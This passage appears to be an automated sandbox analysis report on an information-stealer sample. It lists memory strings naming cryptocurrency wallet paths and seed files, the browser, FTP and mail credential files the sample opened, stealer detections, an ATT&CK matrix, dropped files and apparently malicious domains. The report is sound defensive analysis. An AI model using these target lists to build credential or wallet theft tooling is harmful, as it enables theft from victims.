Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: powershell.exe, 00000007.00000002.2130599014.00000000078F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 13.2.cmd.exe.58700c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.cmd.exe.58700c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 69.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2xs.0.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 13.2.cmd.exe.58700c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.cmd.exe.58700c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 69.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5860, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2xs.0.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2xs.0.exe PID: 5788, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68E00B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,		8_2_68E00B40
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68E00C40 sqlite3_bind_zeroblob,		8_2_68E00C40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 Abuse Elevation Control Mechanism	211 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	11 DLL Side-Loading	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Windows Service	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	212 Command and Scripting Interpreter	11 Scheduled Task/Job	1 Windows Service	3 Obfuscated Files or Information	NTDS	279 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	11 Scheduled Task/Job	2 Registry Run Keys / Startup Folder	312 Process Injection	21 Software Packing	LSA Secrets	1 Query Registry	SSH	11 Input Capture	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	11 Scheduled Task/Job	1 Timestomp	Cached Domain Credentials	441 Security Software Discovery	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	11 DLL Side-Loading	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	13 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Modify Registry	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	251 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	312 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Hidden Files and Directories	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	29%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	31%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	12%	ReversingLabs
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)	12%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
env-3936544.jcloud.kz	5%	Virustotal	Browse
helsinki-dtc.com	3%	Virustotal	Browse
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
d68kcn56pzfb4.cloudfront.net	0%	Virustotal	Browse
d1u0l9f6kr1di3.cloudfront.net	0%	Virustotal	Browse
note.padd.cn.com	1%	Virustotal	Browse
c.574859385.xyz	9%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
svc.iolo.com	0%	Virustotal	Browse
checkdata-1114476139.us-west-2.elb.amazonaws.com	0%	Virustotal	Browse
monoblocked.com	16%	Virustotal	Browse
service-domain.xyz	11%	Virustotal	Browse
api.check-data.xyz	7%	Virustotal	Browse
iolo0.b-cdn.net	0%	Virustotal	Browse
westus2-2.in.applicationinsights.azure.com	0%	Virustotal	Browse
www.rapidfilestorage.com	2%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
download.iolo.net	0%	Virustotal	Browse
googlehosted.l.googleusercontent.com	0%	Virustotal	Browse
240216234727901.mjj.xne26.cfd	0%	Virustotal	Browse
clients2.googleusercontent.com	0%	Virustotal	Browse
skrptfiles.tracemonitors.com	1%	Virustotal	Browse
api4.check-data.xyz	7%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
env-3936544.jcloud.kz	185.22.66.15	true	false	5%, Virustotal, Browse	unknown
monoblocked.com	45.130.41.108	true	false	16%, Virustotal, Browse
